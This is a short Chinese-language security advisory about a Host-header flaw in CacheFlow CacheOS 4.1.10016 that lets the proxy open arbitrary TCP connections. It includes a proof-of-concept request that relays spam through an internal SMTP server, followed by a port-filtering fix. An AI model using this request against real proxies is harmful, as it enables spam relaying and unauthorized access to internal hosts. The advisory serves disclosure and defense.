CacheFlow CacheOS HTTP HOST代理漏洞发布时间:2003-09-10 更新时间:2003-09-10 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8584 受影响系统 CacheFlow CacheOS 4.1.10016详细描述 提交包含恶意HTTP POST头字段的HTTP请求利用CacheOS通道建立任意TCP连接。 CacheFlow CacheOS由于错误的使用HOST头字段,可导致任意用户连接代理后网络中的任意主机,如攻击者可以滥用内部邮件系统发送垃圾邮件等恶意操作。 测试代码 GET / HTTP/1.1 HOST: mailserver.example.com:25 HELO . mail from: spammer@example.com rcpt to: target@example.com DATA Subject: Look Ma! I'm an open relay HI, you've been spammed through an open proxy, because of a bug in the OS code. Have a Great Day! -Spammer . 解决方案 进行如下操作: cacheflow#conf t cacheflow#(config)inline filter-list local ccc https://.*:(443|80) service=yes https://.*:[0-9]+/ service=no http://.*:(443|80) service=yes http://.*:[0-9]+/ service=no ccc 相关信息 参考:http://www.securityfocus.com/archive/1/336991 |
